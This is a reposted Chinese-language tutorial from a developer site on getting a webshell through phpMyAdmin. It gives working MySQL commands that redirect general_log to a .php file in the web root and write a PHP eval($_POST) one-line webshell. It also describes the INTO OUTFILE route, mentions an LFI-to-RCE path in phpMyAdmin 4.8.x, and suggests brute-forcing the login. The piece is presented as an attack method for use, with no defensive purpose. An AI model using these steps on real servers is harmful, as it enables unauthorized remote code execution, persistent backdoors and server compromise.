phpmyadmin getshell大法

栏目: 数据库 · Mysql · 发布时间: 7年前

内容简介:整理phpmyadmin的两种getshell方法,后续有其他方法再更新。show variables like ‘general%’;

0x00 概述

整理phpmyadmin的两种getshell方法,后续有其他方法再更新。

0x01 select日志

show variables like ‘general%’;

phpmyadmin getshell大法

set global general_log = ‘ON’;# MySQL 返回的查询结果为空 (即零行)。

set global general_log_file = ‘C:/phpStudy/PHPTutorial/WWW/logshell.php’;# MySQL 返回的查询结果为空 (即零行)。

phpmyadmin getshell大法

SELECT ‘<?php @eval($_POST[lsa]);?>’

phpmyadmin getshell大法

0x02 into outfile

此法有局限性,必须secure_file_priv不为null && 为网站路径

show variables like “secure_file_priv”;

默认Null

尝试设置为网站目录:

phpmyadmin getshell大法

需要修改my.ini

secure_file_priv=’网站路径

phpmyadmin getshell大法

phpmyadmin getshell大法

phpmyadmin getshell大法

0x03 其他

还有 phpmyadmin4.8.x LFI to RCE

0x04 结语

phpmyadmin上述getshell方法都要登录,可尝试爆破。

0x05 参考资料

www.freebuf.com/column/173672.html


以上所述就是小编给大家介绍的《phpmyadmin getshell大法》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
HTTP

HTTP

David Gourley、Brian Totty、Marjorie Sayer、Anshu Aggarwal、Sailu Reddy / O'Reilly Media / 2002-10-7 / USD 54.99

Product Description Web technology has become the foundation for all sorts of critical networked applications and far-reaching methods of data exchange, and beneath it all is a fundamental protocol......一起来看看 《HTTP》 这本书的介绍吧!

码农工具
CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

MD5 加密
MD5 加密

MD5 加密工具

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2026 码农网 粤ICP备17054400号-3